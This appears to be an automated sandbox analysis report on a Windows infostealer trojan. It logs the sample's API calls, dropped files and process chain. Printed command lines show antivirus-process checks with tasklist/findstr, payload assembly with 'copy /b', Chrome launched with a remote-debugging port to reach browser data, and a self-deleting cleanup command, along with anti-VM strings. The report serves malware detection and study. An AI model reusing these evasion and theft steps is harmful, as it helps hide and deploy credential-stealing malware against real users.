                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00B4F20D
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File created: C:\Windows\MpForgotten
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File created: C:\Windows\TabletAction
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File created: C:\Windows\CommunityProduction
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File created: C:\Windows\ExtractNicholas
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\245347\Dry.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: String function: 00AFFD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: String function: 00B00DA0 appears 46 times
                Source: 9EI7wrGs4K.exe | Static PE information: invalid certificate
                Source: 9EI7wrGs4K.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@43/36@5/6
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B541FA GetLastError,FormatMessageW,10_2_00B541FA
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B42010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00B42010
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B41A0B AdjustTokenPrivileges,CloseHandle,10_2_00B41A0B
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00B4DD87
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B53A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00B53A0E
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\VPN9OH77.htm
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File created: C:\Users\user\AppData\Local\Temp\nsv8BCF.tmp
                Source: 9EI7wrGs4K.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Q9RQQIMOZ.10.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 9EI7wrGs4K.exe | ReversingLabs: Detection: 21%
                Source: 9EI7wrGs4K.exe | Virustotal: Detection: 18%
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | File read: C:\Users\user\Desktop\9EI7wrGs4K.exe
                Source: unknown | Process created: C:\Users\user\Desktop\9EI7wrGs4K.exe "C:\Users\user\Desktop\9EI7wrGs4K.exe"
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com b
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: shfolder.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: riched20.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: usp10.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: msls31.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: napinsp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: pnrpnsp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: wshbth.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: nlaapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: winrnr.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: ntshrui.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Section loaded: cscapi.dll
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: 9EI7wrGs4K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: 9EI7wrGs4K.exeStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B00DE6 push ecx; ret 10_2_00B00DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\245347\Dry.com
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B726DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 10_2_00B726DD
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00AFFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_00AFFC7C
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_10-105013)
                Source: Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DLLVMCHECK.DLLDIR_WATCH.DLLAP@
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | API coverage: 3.7 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 6368 | Thread sleep count: 85 > 30
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00B4DC54
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00B5A087
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00B5A1E2
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00B4E472
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 10_2_00B5A570
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B566DC FindFirstFileW,FindNextFileW,FindClose, 10_2_00B566DC
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B1C622 FindFirstFileExW, 10_2_00B1C622
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 10_2_00B573D4
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B57333 FindFirstFileW,FindClose, 10_2_00B57333
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00B4D921
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00AE5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_00AE5FC8
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\245347
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\245347\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
                Source: Dry.com, 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
                Source: Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5F4FF BlockInput, 10_2_00B5F4FF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00AE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00AE338B
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B05058 mov eax, dword ptr fs:[00000030h] 10_2_00B05058
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B420AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 10_2_00B420AA
                Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B12992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00B12992
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B00BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00B00BAF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B00D45 SetUnhandledExceptionFilter, 10_2_00B00D45
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B00F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00B00F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 10_2_00B41B4D
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00AE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00AE338B
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4BBED SendInput,keybd_event, 10_2_00B4BBED
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4EC9E mouse_event, 10_2_00B4EC9E
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing
